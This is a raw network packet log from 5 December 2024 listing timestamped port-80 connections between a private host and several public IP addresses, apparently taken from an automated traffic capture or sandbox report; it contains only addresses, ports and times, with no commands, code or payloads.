                                                                    Dec 5, 2024 09:44:44.062284946 CET4972680192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:44.084762096 CET4972680192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:44.204956055 CET804972684.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:45.160818100 CET804972684.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:45.161015987 CET4972680192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:45.601111889 CET4972680192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:45.721128941 CET804972684.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:46.620414972 CET4972780192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:46.740130901 CET804972784.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:46.740221977 CET4972780192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:46.756191015 CET4972780192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:46.875930071 CET804972784.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:47.838172913 CET804972784.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:47.838422060 CET4972780192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:48.257536888 CET4972780192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:48.377257109 CET804972784.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:49.276645899 CET4972880192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:49.396522045 CET804972884.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:49.398475885 CET4972880192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:49.414539099 CET4972880192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:49.534375906 CET804972884.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:49.534440041 CET804972884.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:50.495615005 CET804972884.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:50.495699883 CET4972880192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:50.930186033 CET4972880192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:51.049916029 CET804972884.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:51.950397015 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:52.070287943 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:52.070391893 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:52.082525015 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:52.202332020 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167207003 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167243004 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167256117 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167423010 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167434931 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167452097 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167464018 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167475939 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167690039 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:53.167690039 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:53.167737961 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.167747021 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:53.173723936 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:53.173723936 CET4972980192.168.2.884.32.84.32
                                                                    Dec 5, 2024 09:44:53.294743061 CET804972984.32.84.32192.168.2.8
                                                                    Dec 5, 2024 09:44:58.815206051 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:44:58.935090065 CET8049730154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:44:58.935348034 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:44:58.952228069 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:44:59.072184086 CET8049730154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:00.460521936 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:00.463910103 CET8049730154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:00.464013100 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:00.464169979 CET8049730154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:00.464253902 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:00.580367088 CET8049730154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:00.580468893 CET4973080192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:01.479535103 CET4973180192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:01.599420071 CET8049731154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:01.602696896 CET4973180192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:01.618776083 CET4973180192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:01.738444090 CET8049731154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:03.128293037 CET8049731154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:03.128314972 CET8049731154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:03.130517960 CET4973180192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:03.134671926 CET4973180192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.174429893 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.294143915 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:04.294290066 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.325186014 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:04.444947004 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:04.444972992 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:05.835633993 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:05.955677032 CET8049732154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:05.958647013 CET4973280192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.862381935 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.982322931 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:06.982424974 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:06.998460054 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:07.118737936 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.518945932 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.519190073 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:08.519234896 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:08.522435904 CET4973380192.168.2.8154.88.22.105
                                                                    Dec 5, 2024 09:45:08.642138958 CET8049733154.88.22.105192.168.2.8
                                                                    Dec 5, 2024 09:45:14.515980959 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.635741949 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:14.635828018 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.655365944 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:14.776251078 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:16.163876057 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:16.284127951 CET804973485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:16.284198046 CET4973480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.182862043 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.302772045 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:17.302973986 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.318989038 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:17.438775063 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:18.820046902 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:18.940196037 CET804973585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:18.940299034 CET4973580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.840799093 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.960679054 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:19.964699030 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:19.979989052 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:20.100656033 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:20.100981951 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:21.494471073 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:21.614588976 CET804973685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:21.614856005 CET4973680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.511415958 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.631429911 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:22.631525040 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.643873930 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:22.763981104 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.959758997 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.959876060 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:23.962627888 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:23.963655949 CET4973780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:45:24.083447933 CET804973785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:45:29.694278002 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.814172029 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:29.814301968 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.832551956 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:29.952276945 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910343885 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910367012 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910413980 CET8049738199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:30.910450935 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:30.910487890 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:31.338510036 CET4973880192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.356306076 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.477157116 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:32.477243900 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.496433020 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:32.616216898 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572592974 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572798014 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.572812080 CET8049739199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:33.573126078 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:34.010540009 CET4973980192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.027245045 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.147119045 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:35.154627085 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.166600943 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:35.286406994 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:35.286505938 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342675924 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342767000 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342782974 CET8049740199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:36.342808962 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:36.342829943 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:36.679429054 CET4974080192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.698235035 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.818372011 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:37.818546057 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.834777117 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:37.954585075 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915838957 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915883064 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915921926 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:38.915975094 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:38.916013956 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:38.919173956 CET4974180192.168.2.8199.59.243.227
                                                                    Dec 5, 2024 09:45:39.039120913 CET8049741199.59.243.227192.168.2.8
                                                                    Dec 5, 2024 09:45:44.517505884 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.637430906 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:44.637538910 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.656790972 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:44.776640892 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975054979 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975104094 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975141048 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975173950 CET804974291.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:45.975250006 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:45.975250006 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:46.163806915 CET4974280192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.183108091 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.302870035 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:47.306761980 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.323132992 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:47.442935944 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700352907 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700423956 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700437069 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700488091 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:48.700536966 CET804974391.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:48.700586081 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:48.835949898 CET4974380192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.856661081 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.976475000 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:49.976677895 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:49.991933107 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:50.112004995 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:50.112035990 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317899942 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317970037 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.317985058 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.318120956 CET804974491.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:51.318255901 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:51.318255901 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:51.510570049 CET4974480192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.526997089 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.646822929 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:52.646907091 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.658715963 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:52.778537989 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979439974 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979496002 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979507923 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979556084 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979598045 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979618073 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979626894 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979630947 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.979628086 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979671955 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.979959965 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:53.980048895 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:53.989279032 CET4974580192.168.2.891.226.30.3
                                                                    Dec 5, 2024 09:45:54.110023022 CET804974591.226.30.3192.168.2.8
                                                                    Dec 5, 2024 09:45:59.490906000 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.610682964 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:45:59.610816002 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.626393080 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:45:59.746524096 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:00.711502075 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:00.711560965 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:01.132739067 CET4974680192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:01.252553940 CET804974613.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:02.153126955 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.273017883 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:02.273113012 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.295723915 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:02.415682077 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:03.371035099 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:03.371191025 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:03.804495096 CET4974780192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:03.924418926 CET804974713.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:04.824455023 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:04.946221113 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:04.946317911 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:04.960588932 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:05.080426931 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:05.080445051 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:06.044872999 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:06.046706915 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:06.476407051 CET4974880192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:06.596086025 CET804974813.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:07.497328043 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.617122889 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:07.617291927 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.626533985 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:07.746872902 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717693090 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717731953 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:08.717860937 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:08.721113920 CET4974980192.168.2.813.248.169.48
                                                                    Dec 5, 2024 09:46:08.841018915 CET804974913.248.169.48192.168.2.8
                                                                    Dec 5, 2024 09:46:14.313292980 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.433335066 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:14.433440924 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.634778023 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:14.754682064 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.690886021 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.690908909 CET8049750185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:15.691021919 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:16.148415089 CET4975080192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.166526079 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.286534071 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:17.288963079 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.300817013 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:17.420897961 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538708925 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538731098 CET8049751185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:18.538809061 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:18.822711945 CET4975180192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:19.844897985 CET4975280192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:19.964899063 CET8049752185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:19.965053082 CET4975280192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:19.980600119 CET4975280192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:20.100478888 CET8049752185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:20.100519896 CET8049752185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:21.214456081 CET8049752185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:21.214613914 CET8049752185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:21.217601061 CET4975280192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:21.492260933 CET4975280192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:22.512017012 CET4975380192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:22.632590055 CET8049753185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:22.632692099 CET4975380192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:22.649477005 CET4975380192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:22.769272089 CET8049753185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:23.882405043 CET8049753185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:23.882426977 CET8049753185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:23.882891893 CET4975380192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:23.886688948 CET4975380192.168.2.8185.27.134.144
                                                                    Dec 5, 2024 09:46:24.006453037 CET8049753185.27.134.144192.168.2.8
                                                                    Dec 5, 2024 09:46:30.038708925 CET4975480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:30.158567905 CET804975485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:30.158920050 CET4975480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:30.178348064 CET4975480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:30.298238993 CET804975485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:31.679721117 CET4975480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:31.800103903 CET804975485.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:31.802788973 CET4975480192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:32.698673964 CET4975580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:32.818728924 CET804975585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:32.818870068 CET4975580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:32.833400011 CET4975580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:32.953290939 CET804975585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:34.335923910 CET4975580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:34.456326008 CET804975585.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:34.456386089 CET4975580192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:35.358730078 CET4975680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:35.478949070 CET804975685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:35.482848883 CET4975680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:35.497387886 CET4975680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:35.617311001 CET804975685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:35.617373943 CET804975685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:37.007802963 CET4975680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:37.128118038 CET804975685.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:37.128215075 CET4975680192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:38.028749943 CET4975780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:38.148845911 CET804975785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:38.152889967 CET4975780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:38.160312891 CET4975780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:38.280179977 CET804975785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:39.481437922 CET804975785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:39.481548071 CET804975785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:39.481719017 CET4975780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:39.484298944 CET4975780192.168.2.885.159.66.93
                                                                    Dec 5, 2024 09:46:39.604135036 CET804975785.159.66.93192.168.2.8
                                                                    Dec 5, 2024 09:46:45.016179085 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:45.136315107 CET8049758154.23.184.207192.168.2.8
                                                                    Dec 5, 2024 09:46:45.136560917 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:45.150978088 CET4975880192.168.2.8154.23.184.207
                                                                    Dec 5, 2024 09:46:45.272155046 CET8049758154.23.184.207192.168.2.8
